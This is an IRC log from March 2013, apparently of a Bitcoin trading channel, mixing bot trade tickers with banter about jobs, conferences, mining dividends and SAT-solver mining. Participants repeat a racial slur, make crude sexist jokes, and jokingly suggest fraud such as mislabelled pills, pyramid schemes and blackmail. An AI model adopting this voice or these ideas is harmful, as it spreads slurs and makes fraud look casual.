plz Mar 22 10:03:23 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Mar 22 10:04:54 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.15833758 = 158.3376 BTC [-] Mar 22 10:09:13 [BTCTC] [ASICMINER-PT] 4 @ 0.8 = 3.2 BTC [-] Mar 22 10:10:03 [BTCTC] [ASICMINER-PT] 1 @ 0.83 BTC [+] Mar 22 10:10:44 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [-] Mar 22 10:11:56 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 22 10:19:35 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.15827441 = 158.2744 BTC [-] Mar 22 10:22:27 [MPEX] [S.DICE] 1 @ 0.00444444 BTC [+] Mar 22 10:24:53 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.15821772 = 158.2177 BTC [-] Mar 22 10:38:04 [HAVELOCK] [SDICE] 1 @ 0.4679975 BTC [+] Mar 22 10:38:05 [HAVELOCK] [SDICE] 1 @ 0.4679975 BTC [+] Mar 22 10:39:09 [BTCTC] [GSDPT] 20 @ 0.00421 = 0.0842 BTC [+] Mar 22 10:39:11 [BTCTC] [GSDPT] 99 @ 0.0042 = 0.4158 BTC [-] Mar 22 10:40:04 [HAVELOCK] [SDICE] 4 @ 0.46799769 = 1.872 BTC [+] Mar 22 10:41:01 [MPEX] [O.BTCUSD.P750T] 1 @ 0.16058182 BTC [+] Mar 22 10:41:04 [HAVELOCK] [SDICE] 5 @ 0.468 = 2.34 BTC [+] Mar 22 10:42:56 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.15809519 = 158.0952 BTC [-] Mar 22 10:53:14 [BTCTC] [ASICMINER-PT] 1 @ 0.83 BTC [+] Mar 22 10:54:53 well i'm off. take care all. Mar 22 10:56:07 bye **** BEGIN LOGGING AT Fri Mar 22 18:59:45 2013 Mar 22 19:00:11 then move to romania? Mar 22 19:00:18 maybe Mar 22 19:00:38 anyone want some P310T? Mar 22 19:00:43 hi all Mar 22 19:00:49 hi Mar 22 19:00:49 p310 ?! omg ? Mar 22 19:00:50 ;;ticker Mar 22 19:00:51 BTCUSD ticker | Best bid: 71.17002, Best ask: 71.43000, Bid-ask spread: 0.25998, Last trade: 71.17002, 24 hour volume: 72873.11904166, 24 hour low: 68.90583, 24 hour high: 74.90000, 24 hour vwap: 72.06906 Mar 22 19:00:53 howdy :) Mar 22 19:01:00 jeez smix you gave me a start there Mar 22 19:01:08 loool Mar 22 19:01:21 i was like wait what ? is that itm ? Mar 22 19:01:31 deep itm Mar 22 19:01:43 like a vagina Mar 22 19:01:45 jk Mar 22 19:01:56 looks like i'm selling at about .008ish Mar 22 19:03:06 ;calc .01 * 70 Mar 22 19:03:11 ;;calc .01 * 70 Mar 22 19:03:11 0.7 Mar 22 19:03:20 I could have done that in my head... Mar 22 19:03:48 so does anyone know what happend to gox again? Mar 22 19:04:06 just, same as usual?? Mar 22 19:04:20 less than a buck to secure against the coming crash Mar 22 19:04:22 ;) Mar 22 19:05:12 how many Mar 22 19:05:26 mod6: 26 Mar 22 19:05:45 i've got a bet for 1 btc that we see $100 before we see $60 Mar 22 19:05:57 i don't make bets i can't afford to lose Mar 22 19:06:51 ;;asks 74 Mar 22 19:06:55 There are currently 14123.224 bitcoins offered at or under 74.0 USD, worth 1041651.49949 USD in total. | Data vintage: 0.0017 seconds Mar 22 19:07:04 ;;asks 75 Mar 22 19:07:04 There are currently 23081.901 bitcoins offered at or under 75.0 USD, worth 1710738.22608 USD in total. | Data vintage: 9.6104 seconds Mar 22 19:07:08 hmm Mar 22 19:07:28 ;;asks 73 Mar 22 19:07:28 There are currently 1320.1523 bitcoins offered at or under 73.0 USD, worth 96186.0854616 USD in total. | Data vintage: 33.3853 seconds Mar 22 19:08:17 maybe i do just need to take a week off and just sequester myself Mar 22 19:08:28 man that sounds awesome actually. Mar 22 19:08:52 sequester yourself in a room with a bed and just sleep ? Mar 22 19:09:00 na. Mar 22 19:09:10 just to hack for a week on bitotter to wrap it up Mar 22 19:09:48 [BTCTC] [BTC-BOND] 1 @ 0.009822 BTC [-] Mar 22 19:09:50 too damn busy to get enough time to dig in deep enough to make sure all the secuirty stuff is underwraps Mar 22 19:10:03 its like, I need 8 hour blocks at a time min. Mar 22 19:10:10 hard to come by for me these days. Mar 22 19:11:21 I guess if it gets to be too long, I might just open source the thing and let you guys work on it if you want to. Mar 22 19:11:40 what's the thing? Mar 22 19:11:48 my android tool for mpex Mar 22 19:12:03 started it a long time ago, but i have 3 other jobs other than btc Mar 22 19:12:23 i can see why you'd want to free the code :) Mar 22 19:12:27 so im pretty swamped. and i have an overly demanding gf who eats up time. Mar 22 19:12:41 <@gribble> There are currently 1320.1523 bitcoins offered at or under 73.0 USD, worth 96186.0854616 USD in total. | Data vintage: 33.3853 seconds Mar 22 19:12:41 mjr_: are you here? Mar 22 19:12:44 Lol Mar 22 19:12:48 Data vintage Mar 22 19:13:11 last night she was all, "no. fuck you. you said you weren't going to talk with your dungons and dragons friends all night..." Mar 22 19:13:14 hahaha Mar 22 19:13:21 i can't win Mar 22 19:13:32 [BTCTC] [GSDPT] 10 @ 0.00439 = 0.0439 BTC [+] Mar 22 19:13:49 [BTCTC] [GSDPT] 5 @ 0.004477 = 0.0224 BTC [+] Mar 22 19:14:08 [BTCTC] [GSDPT] 200 @ 0.004638 = 0.9276 BTC [+] Mar 22 19:14:10 [BTCTC] [GSDPT] 74 @ 0.004638 = 0.3432 BTC [+] Mar 22 19:14:29 http://i.imgur.com/PKM3G3O.png dang, 2 'less than 1's will do that Mar 22 19:14:30 [01:12:29] so im pretty swamped. and i have an overly demanding gf who eats up time. Mar 22 19:14:34 then shes a girl, not a woman. Mar 22 19:14:37 this is why I only date women. Mar 22 19:14:46 Girlfriends who don't like you hanging with anyone else? Sounds familiar. Mar 22 19:14:47 well,she's probably older than you dickweed Mar 22 19:15:20 [BTCTC] [GSDPT] 86 @ 0.004639 = 0.399 BTC [+] Mar 22 19:15:35 mod6: age has nothing to do with it Mar 22 19:15:47 some girls never grow up Mar 22 19:18:07 jurov: how are you? Mar 22 19:18:13 mod6 poor gf. Mar 22 19:18:46 females are dangerous to irc use Mar 22 19:18:52 beware Mar 22 19:19:18 that's why I use it mostly at work, and just check it at home, make sure you all didn't break BTC Mar 22 19:19:21 ;) Mar 22 19:19:39 ssh from my ipad to my box. Mar 22 19:19:44 yay! Mar 22 19:19:57 yeah Diablo-D3, my bad, yeah, she's just like all the others :/ Mar 22 19:20:20 just wish i didn't have to work my everyday job. Mar 22 19:20:31 job(s) Mar 22 19:20:38 mod6 nix guys are in high demand Mar 22 19:20:45 why you suffering for these many jobs? Mar 22 19:20:51 yeah, they're blowing me up all the time for different jobs. Mar 22 19:21:07 you gotta nail your contract down so every phone call is a separate charge Mar 22 19:21:12 well... i dunno. i guess im just lame. Mar 22 19:21:15 and raise your prices Mar 22 19:21:24 i wish i could. Mar 22 19:21:25 until you can't get anymore work, then lower them a tiny bit Mar 22 19:21:36 mod6 ya srsly, they have a point. if you have three jobs make each offers for 50% what you're making now, upfront Mar 22 19:21:41 at least 1 won't go for it Mar 22 19:21:46 so now you have two jobs and the same dough Mar 22 19:22:05 ah, i like that too ^^ Mar 22 19:22:09 well, it was 3, now 2 of them mereged together, so its really like two. Mar 22 19:22:15 ewww. Mar 22 19:22:18 sound sticky Mar 22 19:22:23 and basically i flipped out on these dudes a bunch of times. Mar 22 19:22:28 find a new job, SINGULAR, for %50 more than you are making Mar 22 19:22:36 m,erged together = hey, you know we used to pay you for two things ? well only pay you for one from now on Mar 22 19:22:39 which consists of the two Mar 22 19:22:44 now, i'm getting them to get other help, so that's been better, but its been hard to unwind all this stuff. Mar 22 19:22:44 lol Mar 22 19:22:51 lot of knowelege to transfer, etc. Mar 22 19:23:05 mircea_popescu: yeah, basically. Mar 22 19:23:18 these guys are terrible. Mar 22 19:23:40 i always seem to end up working for really terrible contracts or employers Mar 22 19:23:50 *shrug* Mar 22 19:24:02 anyway, hopefully i can be my own guy after this with btc Mar 22 19:24:08 you gotta learn to tell people to fuck off. Mar 22 19:24:10 then i can just work on what we need Mar 22 19:24:30 haha, i DID tell them to fuck off about 49 times. but they're gonna sue if i pitch their stuff ina snowbank Mar 22 19:24:45 so what arte they gonna sue for, your btc ? Mar 22 19:24:48 your gf ? Mar 22 19:24:49 hand it to them nicely and say, contract CANCELLED Mar 22 19:25:11 by the way, if anyone wants a funny story : i hired a freelance guy to do my persian faq. Mar 22 19:25:15 you guys Mar 22 19:25:21 neither of you do contract software work Mar 22 19:25:26 imo he did a good job, nice responsible young man so at the time i tipped him 1 btc Mar 22 19:25:32 this was back when btc was like 15... Mar 22 19:25:35 benkay: wut Mar 22 19:25:44 dw and mp, mod6 not u Mar 22 19:25:52 oh wer Mar 22 19:25:53 d Mar 22 19:25:56 benkay i sometimes do contract management of software work Mar 22 19:26:12 i was contractor up until monday. Mar 22 19:26:17 now I've got health insurance! Mar 22 19:26:19 fuck yeah Mar 22 19:26:21 anyway, i gotta finish unwinding this stuff then i'll be free of this obligation. Mar 22 19:26:26 "a contractor != contract coder" Mar 22 19:26:31 i'm gon go thow myself down a flight of stairs Mar 22 19:26:38 benkay: ah yes, you're right Mar 22 19:26:40 clarkmoody keeps fucking up :( Mar 22 19:26:41 wont be long i think.. the process is alreay in motion, and has been in motion since the beginning of this ydar. Mar 22 19:26:45 *year Mar 22 19:26:54 mod6 "the wheels are in motion... things are happening..." Mar 22 19:26:56 manners and reputation are important to contractors. Mar 22 19:27:44 not that they're not to everyone else. Mar 22 19:27:46 i see where you are going. but he shold not suffer un endingly because he's worried about what they might say Mar 22 19:27:55 guys, im like a peon Mar 22 19:28:12 when i first signed up with these guys, the first thing they did was sue VMWare Mar 22 19:28:39 mod6, you must have some kind of skill, NIX guys are in HIGH demand, go find something better, where you are slightly respected and not peonized Mar 22 19:28:41 anyway, i can't say any more. Mar 22 19:28:45 is peonized a word? Mar 22 19:28:58 peonized is a wordized word. Mar 22 19:29:13 sorry mod6, sholdn't be telling you what to do. Mar 22 19:29:20 but my feelings are as I have stated Mar 22 19:29:20 i know tons of shit, and can get stuff done. the problem is im poor and have no representation against these evil assholes. Mar 22 19:29:33 if you're poor than you've got nothing to lose Mar 22 19:29:41 you've never been better positioned to take the fucking world on Mar 22 19:29:47 cos they can't take shit Mar 22 19:29:52 well, basically yes. but, i've got some living situation that needs to be solved. Mar 22 19:29:58 i can't go back to living inthe street again Mar 22 19:30:02 at lesat not up here Mar 22 19:30:04 too fucking cold Mar 22 19:30:12 mod6 if you're poor you're immune. Mar 22 19:30:16 i used to just live on peoples front porch couches after IBM Mar 22 19:30:19 sueing only works against the middle class. Mar 22 19:30:27 the rich will fuck you up and the poor literally don't care. Mar 22 19:30:42 yeah, i'll fucking rage Mar 22 19:30:53 i need to stay out of jail Mar 22 19:31:02 ya well i got news for you Mar 22 19:31:05 and out of the hospital too, my health isn't super great :/ Mar 22 19:31:09 debtor jail went out in like1800s Mar 22 19:31:17 it's coming backin states mircea_popescu Mar 22 19:31:22 so i heard lol Mar 22 19:31:37 jail is a part of life Mar 22 19:31:37 they shoul;d just give up the pretense and just make the country a penitentiary. Mar 22 19:31:45 its just, trying to not let them get you Mar 22 19:31:48 they're obviously rebuilding soviet era russia, might as well Mar 22 19:31:56 ^^^^ Mar 22 19:31:57 everyone gets a cell in a cheapo concrete block like india Mar 22 19:32:11 yeah, its a fucking nightmare over here Mar 22 19:32:40 it is once you're in the legal system. Mar 22 19:32:48 they just trump up some charges, and tell you well you can do 90 days for this, or you can go to trial and we'll trhow the book at you... Mar 22 19:32:49 you're chewed up Mar 22 19:33:11 mod6 and you say fuck you, this will be the trial of the century Mar 22 19:33:22 and then get the jury to annul Mar 22 19:33:25 not if he can't afford a lawyer Mar 22 19:33:26 which breaks the law outright. Mar 22 19:33:36 you don't need a lawyer to fuck them up. you just need to know the law. Mar 22 19:33:41 true Mar 22 19:33:46 if you can learn to code you can learn the law. Mar 22 19:33:51 there's scarce difference. Mar 22 19:34:19 well, if they ever try to get me for BTC, ill just do what hitler did Mar 22 19:34:27 haha don't be silly. Mar 22 19:34:29 but to be at the level of senior engineer, a lawyer would need 10 yrs exp in a particular part of the law Mar 22 19:34:38 well, what i mean is, in his trial Mar 22 19:34:38 deadweasel not true. Mar 22 19:34:55 it takes 10 year for the senior engineer to gain his reputation with others Mar 22 19:34:56 he just stood up there and told everyone his side of things for like three days lol Mar 22 19:35:01 not to gain his knowledge of coding Mar 22 19:35:08 then they only gave him like 3 years after the beer hall putch Mar 22 19:35:08 that's done in four motnhs when he's 19 Mar 22 19:35:19 mod6 o that. yeah Mar 22 19:35:22 Chilca: hi, all fine Mar 22 19:35:27 thought you meant the bunker suicide Mar 22 19:35:31 me too Mar 22 19:35:41 i was like, none of that pls Mar 22 19:35:42 haha mircea_popescu, na. Mar 22 19:35:59 jesus christ, did I just say "i was like" Mar 22 19:36:05 yes. i infected you. totally. Mar 22 19:36:06 i'm REVERSE AGING! Mar 22 19:36:38 fuck me, I'm still at work...... gonna go pretend for a bit. Mar 22 19:36:45 anyway, this is far off into the weeds! Mar 22 19:37:24 [BTCTC] [S.DICE-PT] 49 @ 0.0047 = 0.2303 BTC [-] Mar 22 19:37:26 I think deadweasel is the key to rejuvenation. I suggest we ground him to a thin powder and make pills. Mar 22 19:37:35 thanks for entertaining our opinions mod6 Mar 22 19:37:36 ;;ticker Mar 22 19:37:36 BTCUSD ticker | Best bid: 71.27110, Best ask: 71.79950, Bid-ask spread: 0.52840, Last trade: 71.79950, 24 hour volume: 67908.09473960, 24 hour low: 68.90583, 24 hour high: 74.00000, 24 hour vwap: 71.94412 Mar 22 19:37:45 it's likely, Namworld Mar 22 19:37:49 deadweasel: ok :} Mar 22 19:37:53 sorry for all the chatter. Mar 22 19:37:57 i wouldn't swallow dead weasel pills Mar 22 19:38:06 i just need to get some of this personal stuff sorted so i have more time for you guys. Mar 22 19:38:08 you'd swallow deadweasel nuts though Mar 22 19:38:13 :P Mar 22 19:38:38 mod6, you need more time for you first, then you might be more useful here, for whatever it is y'all are doing. options i think Mar 22 19:38:49 You don't have to tell people it's dead weasel. Just label them as reverse aging pills. Sell them for 2 BTC a piece since it's very complex chemicals... Mar 22 19:38:52 [BTCTC] [GSDPT] 10 @ 0.004 = 0.04 BTC [-] Mar 22 19:39:01 in fact, i'm selling those. Mar 22 19:39:09 mircea_popescu: my local Russian grocery actually sells pills claiming to be made from dead weasels. Mar 22 19:39:15 2 btc each, might look like benadryl, but really is reverse aging Mar 22 19:39:20 asciilifeform buy me some ? Mar 22 19:39:29 asciilifeform: me too Mar 22 19:39:37 add to my collection Mar 22 19:39:42 http://trilema.com/2010/stabilizarea-vaginului/ <<< vagoo stabilizers Mar 22 19:40:31 wat Mar 22 19:40:41 vagostabyl, the vaginal stabilizer pill. Mar 22 19:40:48 o i can read thank you Mar 22 19:40:52 yw :D Mar 22 19:40:53 just expressing emotions Mar 22 19:40:58 mircea_popescu: here's a photo: http://greenapteka.com/zen_cart/images/Barsuchiy%20shir_capsules.jpg Mar 22 19:41:04 [BTCTC] [GSDPT] 34 @ 0.0038 = 0.1292 BTC [-] Mar 22 19:41:23 hahaha seems legit Mar 22 19:41:30 how much are they ? Mar 22 19:41:31 benkay: lol Mar 22 19:41:49 are you guys familiar with the famous wat talk? Mar 22 19:41:55 nop Mar 22 19:41:57 i know this isn't a super dev-y group, but some of you might enjoy Mar 22 19:42:04 and the rest are smart enough to get it Mar 22 19:42:27 https://www.destroyallsoftware.com/talks/wat Mar 22 19:42:31 omg ban him Mar 22 19:42:36 how dares he say we're not devvy Mar 22 19:42:37 mircea_popescu: they were behind the counter, so presumably not cheap. I didn't ask... Mar 22 19:43:56 the drugs they sell here at least get you high Mar 22 19:43:58 super dev-y! Mar 22 19:44:03 gosh Mar 22 19:44:08 intentional misconstrue. Mar 22 19:44:13 for the LOSE. Mar 22 19:44:17 lol Mar 22 19:44:42 fucking troll, you. Mar 22 19:44:50 99% of the time you're serious Mar 22 19:44:54 impossible to call troll on Mar 22 19:45:00 girls say this to me all the time. Mar 22 19:45:06 even when you say things like "nigger nigger nigger nigger" Mar 22 19:45:26 asciilifeform isn't that a badger ? Mar 22 19:45:35 i am going to adopt this attitude. Mar 22 19:45:38 benkay part of my charm! Mar 22 19:45:48 "you have no idea if i'm serious or not!" Mar 22 19:45:52 hey guise Mar 22 19:45:56 i'm launching a mining company Mar 22 19:46:02 [HAVELOCK] [VTX] 1 @ 0.54399999 BTC [+] Mar 22 19:46:04 we're going to collect giveaway raspberry pis Mar 22 19:46:07 and mine with them Mar 22 19:46:10 list it on bitbillions.com Mar 22 19:46:21 perhaps epic trolls are always built on uncertainty Mar 22 19:46:21 then give the bitcoins to afurka Mar 22 19:46:36 probably, right? Mar 22 19:47:07 a badger is a weasel Mar 22 19:47:10 but for the record we're savvy devvy[ous] over here. Mar 22 19:47:23 deadweasel shush you. how's the russian to know Mar 22 19:47:53 i can't let my fellow badgers be excluded Mar 22 19:48:02 [HAVELOCK] [SDICE] 8 @ 0.451001 = 3.608 BTC [-] Mar 22 19:48:34 mircea_popescu: yeah, it is a badger, isn't it. They also had: "Groundhog Fat: Enriched!" Mar 22 19:48:53 https://bitcointalk.org/index.php?topic=156309.0 loller. Mar 22 19:49:02 [HAVELOCK] [VTX] 1 @ 0.54399999 BTC [+] Mar 22 19:49:06 lol enriched groundhog fat Mar 22 19:49:16 friday is off-topic day? Mar 22 19:49:20 but at least that's a folk remedy here as well Mar 22 19:49:21 let's refocus Mar 22 19:49:44 is it friday even ? Mar 22 19:49:47 how would you go about using bitcoins to get fantastically wealthy while a country prints currency like crazy? Mar 22 19:49:57 benkay you preorder basics Mar 22 19:50:40 benkay: start a (legal) pyramid scheme. Mar 22 19:50:55 how do that, asciilifeform? Mar 22 19:51:04 and mircea, basic staples? Mar 22 19:51:11 bullets and canned beans and whatnot? Mar 22 19:51:12 no, basic miners Mar 22 19:51:23 benkay: http://en.wikipedia.org/wiki/Sergei_Mavrodi . or what MP said. Mar 22 19:51:25 not necessary i have a pi far Mar 22 19:51:26 got him twice in an hour lol Mar 22 19:51:26 farm Mar 22 19:51:39 shit lol Mar 22 19:51:50 In 2007 Sergei Mavrodi was found guilty in a Russian court of defrauding 10,000 investors out of 110 million rubles ($4.3 million). Mar 22 19:51:58 peanuts! Mar 22 19:52:00 incidentally, i bet you that's the banking mavrodi fambly. Mar 22 19:52:10 peanuts i tell you. Mar 22 19:52:56 i hear no good ideas. Mar 22 19:53:14 you all fail at exploiting failing sovereigns. Mar 22 19:53:45 benkay: I hear protection rackets are a good investment: http://cluborlov.blogspot.com/2013/03/where-theres-no-government.html Mar 22 19:53:46 it's more like we are rotting from the inside out, for the US anyways. Mar 22 19:54:01 too much work, asciilifeform. Mar 22 19:54:01 yeah, get into the hired gun biz Mar 22 19:54:17 plus you actually have to deal with the underclass Mar 22 19:54:22 show some imagination, folks! Mar 22 19:54:28 benkay: the minions do the work Mar 22 19:54:45 like, buy assets on the local stock exchange. is good idea? Mar 22 19:54:46 whore yourself to congress and then blackmail? Mar 22 19:55:20 deadweasel: i prefer to be the one purchasing sex, and i don't find myself attracted to vote-grubbers. Mar 22 19:56:32 asciilifeform jesus christ that sounds as a complete rewrite of an article i wrote in like 2010 Mar 22 19:56:46 since its unlikely that guy reads romanian, i'd say woot! people are getting it! Mar 22 19:56:55 mircea_popescu: collapse veterans think quite alike. Mar 22 19:57:12 orlov's old news, mircea Mar 22 19:57:14 i guess once you've seen her whore out you'll never buy into the virgin mary theory again. Mar 22 19:57:28 mircea_popescu: Orlov has been writing since the mid-2000s Mar 22 19:57:57 so Mar 22 19:57:59 whats the news Mar 22 19:58:38 kakobrekla 31 puts are in the money now. Mar 22 19:58:57 hrm? Mar 22 19:59:04 unrelated: anyone have thoughts re: "satcoin" (http://jheusser.github.com/2013/02/03/satcoin.html) ? Mar 22 19:59:19 satan coin? Mar 22 19:59:38 Luke-Jr gonna merge mine with it' Mar 22 19:59:43 satancoin ?! lol srsly ? Mar 22 20:00:24 o it's a sat solver Mar 22 20:00:38 [BTCTC] [ASICMINER-PT] 2 @ 0.79696 = 1.5939 BTC [+] Mar 22 20:01:02 [HAVELOCK] [VTX] 4 @ 0.544 = 2.176 BTC [+] Mar 22 20:01:42 ok this is actually interesting. Mar 22 20:02:00 asciilifeform you working on that ? Mar 22 20:02:09 oh look. a reason for miners to use a stack other than the hairball. Mar 22 20:02:14 mircea_popescu: I can't bring myself to read the btc forums, did anyone discuss it there? Mar 22 20:02:32 mircea_popescu: and no, this wasn't my idea. I may or may not have a better one, however. Mar 22 20:02:35 not afaik. Mar 22 20:02:51 you know you can work on other people's ideas just like you can work on other people's daughters Mar 22 20:02:58 no requirement to keep it in the house. Mar 22 20:03:02 [HAVELOCK] [VTX] 11 @ 0.5451 = 5.9961 BTC [+] Mar 22 20:03:22 mircea_popescu: well yes. and cryproanalytic attacks on hashes aren't new, per se. Mar 22 20:03:41 right. Mar 22 20:03:47 the bruteforce approach is solid and obvious Mar 22 20:03:57 mircea_popescu: but yes, that's the only sort of BTC mining I'm personally interested in (well, that and optical computers.) Mar 22 20:03:58 but i always suspected this is going to be the one way we end up with ai Mar 22 20:04:02 [HAVELOCK] [VTX] 1 @ 0.53 BTC [-] Mar 22 20:04:08 because i always thought that minsky & all may be nice and good Mar 22 20:04:17 but ai won't exist until there's an edge application which makes money. Mar 22 20:04:55 mircea_popescu: bruteforce mining is a contest of fiat bank accounts (and perhaps botnets.) I prefer contests of wits. Mar 22 20:05:19 ai isn't wits, really. but anyway, i always imagined the headlines. "bitcoin provokes singularity" Mar 22 20:05:30 https://bitcointalk.org/index.php?topic=77870.msg1659386#msg1659386 Mar 22 20:05:31 http://www.bitcoin2013.com/ Mar 22 20:06:00 [BTCTC] [BTC-BOND] 12 @ 0.009822 = 0.1179 BTC [-] Mar 22 20:06:32 mp, you gonna go tell them whats up? Mar 22 20:06:34 http://www.bitcoin2013.com/bitcoin-2013-panelists.html Mar 22 20:06:35 mircea_popescu: it's happening, BTC is a huge push towards it, the algorithms that come out of this could fuel future AI Mar 22 20:06:40 so i'm currently eating nutella dipped figs. Mar 22 20:06:42 wouldn't it be riotously funny if a 386 eventually outhashes the ASICs... Mar 22 20:06:43 anyone ever tried that ? Mar 22 20:06:47 theres tihan Mar 22 20:06:51 at least no taaki Mar 22 20:07:07 meh Mar 22 20:07:10 kakobrekla o i c, the "community" Mar 22 20:07:49 total pedosmile on hearn Mar 22 20:09:18 and Mar 22 20:09:18 Johnathan (Yoni) Assia is the CEO of eToro, the world’s largest social investment network. He has shown an interest in finance and computer science since his youth and so decided to merge his passions. Mar 22 20:09:30 why the hell would he be talking Mar 22 20:10:03 buncha bitcoin lamers. Mar 22 20:10:23 kakobrekla listen, this is how conferences work in any biz Mar 22 20:10:41 people with not much better to do. Mar 22 20:10:51 :\ Mar 22 20:11:01 heyo https://bitcointalk.org/index.php?topic=99497.msg1659420#msg1659420 Mar 22 20:11:09 mircea: no, but odly enough that sounds good. Mar 22 20:11:26 I like plain figs tho... Mar 22 20:12:30 it's great you should try it sometime Mar 22 20:13:14 [BTCTC] [ASICMINER-PT] 1 @ 0.762 BTC [-] Mar 22 20:13:28 I learned this thing about conferences recently Mar 22 20:13:32 [BTCTC] [ASICMINER-PT] 1 @ 0.7612 BTC [-] Mar 22 20:13:35 [BTCTC] [ASICMINER-PT] 10 @ 0.7612 = 7.612 BTC [-] Mar 22 20:13:59 benkay which thing Mar 22 20:14:12 that they're filled with people with not enough to do Mar 22 20:15:03 looks like no profits for sdice this month Mar 22 20:15:21 ThickAsThieves in fairness, it's above ev anyway. Mar 22 20:15:46 if it loses another 6k or so it'd just make things "fair" Mar 22 20:16:30 This week meets more stagnancy of deploying. But in the last few days we poured 0.5TH/s into our mining farm as the installing of power cables in the new place goes on. The total hashrate grows much less than this, mostly possibly because of the bottleneck in our local network setting. We are still identifying and fixing the problem. Mar 22 20:16:38 yeah Mar 22 20:16:38 so asicminer still not at the adverised 12th Mar 22 20:16:40 dump sdice Mar 22 20:16:42 buy bbet Mar 22 20:17:02 has it reached 5k bet already ? Mar 22 20:17:16 It was bound to happen , a bad month- every business has good and bad months Mar 22 20:17:28 o we are at 4.5k now Mar 22 20:17:30 a day or three more Mar 22 20:17:41 https://bitcointalk.org/index.php?topic=99497.msg1659432#msg1659432 Mar 22 20:18:32 ahaha so jgarzik wants to code an exchange. Mar 22 20:18:39 urlpls Mar 22 20:18:43 i guess we will have > 9000 of them by the time year's out Mar 22 20:19:07 the exchanges will need to modfiy their operating models once ill put btc/usd in MT4 Mar 22 20:19:09 this is the problem with "Devteam". they're not devs, they're kids looking to impress. Mar 22 20:19:17 they will transform to brokers Mar 22 20:19:22 this by definition fails to impress. Mar 22 20:22:59 anyone know if someone ever built a miner out of discrete emitter-coupled logic (or gallium arsenide, or the like) ? Mar 22 20:24:04 afaik never hapened. Mar 22 20:24:16 hi all Mar 22 20:25:09 wow i got an answer https://bitcointalk.org/index.php?topic=99497.msg1659490#msg1659490 Mar 22 20:25:32 ThickAsThieves nice q re asicminer Mar 22 20:29:06 What will the next div look like for the Asic miner PT's? Mar 22 20:29:14 hard to say Mar 22 20:29:19 there will be a difficulty change Mar 22 20:29:28 whats a good guess? Mar 22 20:29:31 avalons are slowly hopping on the network Mar 22 20:29:36 the div seems to be getting bigger though Mar 22 20:29:41 a good guess is half what they were last time Mar 22 20:29:58 .015 ish then, still seems decent. Mar 22 20:30:08 it is Mar 22 20:30:14 https://bitcointalk.org/index.php?topic=124441.msg1658664#msg1658664 Mar 22 20:30:15 hehe Mar 22 20:30:28 ThickAsThieves: I really doubt half Mar 22 20:30:35 and they already paid for manufacturing 50 more TH I think Mar 22 20:30:40 ThickAsThieves: remember, friedcat hasnt gotten all of the 15th online yet Mar 22 20:30:45 Namworld: yeah Mar 22 20:30:53 and the total farm will be around 60 th Mar 22 20:30:55 that too... hopefully they can get their shit together Mar 22 20:32:11 he just asked what the next div might be Mar 22 20:32:16 half is a fair guess Mar 22 20:32:22 Yeah, I like the answer Mar 22 20:32:24 :) Mar 22 20:32:49 they might get another 1th online before then Mar 22 20:32:55 tahts my guess Mar 22 20:33:10 and i'm the expert here bro! Mar 22 20:33:24 Haha, I just needed a rough estimation Mar 22 20:33:41 just joshin ;) Mar 22 20:33:53 I haven't been following anything in the asset world for a while Mar 22 20:34:00 any word from josh' Mar 22 20:34:21 DId they eat all the chips Mar 22 20:34:25 <[\\\]> kakobrekla: "coming soon" Mar 22 20:35:41 so, i've read the scrollback and some links. and all i'm remembering is that mircea tried to stabilize a vagina by poring concrete. Mar 22 20:35:49 *pouring Mar 22 20:36:17 out of a powdered dead weasel's anus Mar 22 20:38:41 ;;rate 1 thestringpuller Joined the BitOTTer project! Mar 22 20:38:41 Error: 'thestringpuller' is not a valid integer. Mar 22 20:38:47 bah Mar 22 20:38:54 ;;rate thestringpuller 1 Joined the BitOTTer project! Mar 22 20:38:56 Rating entry successful. Your rating of 1 for user thestringpuller has been recorded. Mar 22 20:38:57 ;;rate thestringpuller Mar 22 20:38:58 (rate []) -- Enters a rating for in the amount of . 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Mar 22 20:47:46 twitter suggest to follow britney spears to bitbet Mar 22 20:48:18 we have been solving BNFs by hand in highshool. so have firsthand experience how NP-hard that stuff is with increasing number of variables Mar 22 20:49:27 ltc is back to 0.006 i see :) Mar 22 20:49:55 4 bits/variables - trivial, 5/6 bits - solvable by hand if you have time and patience Mar 22 20:50:21 up to 20 bits - fully solvable by computer Mar 22 20:50:53 anything beyond that, you can only stab in the problem and hope you'll get something close anoutgh to minimal Mar 22 20:51:03 *enough Mar 22 20:52:11 are we talking about SAT solving? Mar 22 20:52:14 yes Mar 22 20:52:47 doesn't sat solving get easier Mar 22 20:52:56 over time? Mar 22 20:53:41 generally when computers get 2x more powerful, you can solve one bit more Mar 22 20:54:18 so it will really take some time till we arrive to 160 or 256 bits Mar 22 20:56:06 fresh from the mp evil rants department : http://trilema.com/2013/of-mice-and-men-revisited/ Mar 22 20:56:48 jurov depends if they actually get a breakthrough. Mar 22 20:57:00 this isn't a universal np problem they're approaching but a well defined subset Mar 22 20:57:21 yes, that's also possible. Mar 22 20:57:40 that's i think the motivating factor : one clever idea, lots of value in it. Mar 22 20:58:12 oh mp, have you seen i coined a new term befitting teh community? "mining scene" Mar 22 20:58:25 hehe Mar 22 20:58:31 as in buncha hipsters ? Mar 22 20:59:03 https://twitter.com/coin_br << like, used here Mar 22 20:59:40 we reviewed mining scene Mar 22 21:00:11 lol k Mar 22 21:00:25 "I fire twentysomethings of his particular school of mental retardation " Mar 22 21:00:36 fire them for making mistakes, or insisting the mistakes are the software's problem? Mar 22 21:01:08 mircea_popescu: the "I fire..." quote reads like "I expel rabid badgers from my house every day." Mar 22 21:01:17 (which is actually their problem by proxy they just don't get it) Mar 22 21:01:20 well... kinda what it is. Mar 22 21:01:22 mircea_popescu: one naturally wants to ask: why were they there? Mar 22 21:01:34 benkay in general it goes EXACTLY like the bitcoin shit went down. Mar 22 21:01:46 new kid wants to improve X with Y supertechnology we old stuffies don't know abou Mar 22 21:01:47 BFL is going to fail to deliver for 2 reasons Mar 22 21:01:52 because we just dion't understand, maan Mar 22 21:01:57 mircea_popescu: nice article Mar 22 21:02:00 1) they are short asic 2) they are short BTC 3) they are long USD Mar 22 21:02:08 mm Mar 22 21:02:08 mircea_popescu: that is, why do you hire them? Mar 22 21:02:14 want to talk more about this Mar 22 21:02:16 but team lunch impends. Mar 22 21:02:19 i don't hire them, they just get hired. Mar 22 21:02:38 in 